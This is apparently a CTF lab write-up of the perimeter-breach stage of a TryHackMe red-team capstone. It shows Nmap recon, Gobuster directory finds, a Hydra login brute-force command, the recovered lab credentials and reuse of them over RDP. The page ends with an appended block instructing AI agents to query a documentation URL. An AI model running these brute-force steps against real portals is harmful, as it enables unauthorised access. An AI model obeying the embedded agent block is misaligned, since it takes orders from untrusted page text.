# Perimeter Breach ## Target VPN 10.200.XXX.12 ## Used Tools Nmap Gobuster Hydra Burp Suite diff Remmina ## Summary For the perimeter breach, we target the public-facing VPN server, due to the nature of the subject it might connect to the internal network and offers a favorable opportunity to attack this target first. We’ll scan the web server with Gobuster and detect two directories, of which one contains an OpenVPN file, which will connect us to the internal network. But this file is available to all and leads to an unstable RDP connection. It's enough for the perimeter breach to retrieve the first flag. There is also a login form that can be brute-forced using the previously gained information from the OSINT section. Gaining access to the page behind the login form reveals a form to submit usernames to generate an individual OpenVPN file, providing a more stable connection. The form itself is vulnerable and will be discussed in the next chapter Initial Compromise of Active Directory. ## Recon We see there is an SSH access running on port 20 and a webserver running on port 80. ```bash ┌──(0xb0b㉿kali)-[~] └─$ nmap -sT -sV -sC 10.200.103.12 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 05:38 EDT Nmap scan report for 10.200.103.12 Host is up (0.070s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e275e6b20f4ba886dccddd911f12b161 (RSA) | 256 e01568d4735cd6de7d9f9b4cbe9584b3 (ECDSA) |_ 256 35c9f1745f021bbdefe8c8d252f2fe12 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: VPN Request Portal |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.43 seconds ```

Checking out the webserver with Gobuster reveals two directories, `/vpn` and `/vpns`. The `/vpns` directory seems empty but directing to the `/vpn` directory reveals an OpenVPN file.

Visiting `/vpn`

Visiting `/vpns`

Directly visiting `10.200.XXX.12` the web server greets us with a login prompt.

## Investigation After reviewing the request for login with Burp Suite, we are able to craft a brute-force attack via Hydra.

Running Hydra with our previously crafted users and password list we are able to retrieve the credentials of a single account. `laura.wood@corp.thereserve.loc:Password1@` ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone] └─$ hydra -L users-mail.txt -P passwords.txt 10.200.103.12 http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v ```

Using those credentials we are able to log in.

The form prompts us to submit an account name, on login it's filled in before with `laura.wood@corp.thereserve.loc`. Just giving my own name a shot, it works just as well.

Next, analyze the request in Burp Suite to inspect if there is anything special.

Downloading two OpenVPN files for comparison.

Getting the diff between both hints that they might be individual.

On the first attempt at the beginning of the challenge the routes were set correctly and we were able to reach `10.200.XXX.21` and `.22`. Both `WRK` machines of the internal network.

Scanning those reveals their FQDN `WRK_.corp.thereserve.loc` and they have an open RDP port `3389`.

Using Remmina to connect to the `WRK1` machine reusing the credentials of `laura.wood` gives us a connection to the machine.

On the machine itself, we are able to submit the first flag. We breached the perimeter.

## Flag-1: Breaching the Perimeter For flag submission, you have to reach out to the `10.200.XXX.250` machine. Register an account and submit proof of compromises. On doing that you have to provide the machine hostname, then it asks you to store a file on a given location, named with your username and the content of an `uuid` it. For the purpose of the write-up, I did not redo that again, instead, I show you how and where to place the given `uuid`. In this case, at `C:\Windows\Temp\0xb0b.txt` to prove of breaching the perimeter.

`echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/red-team-capstone-challenge/perimeter-breach.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.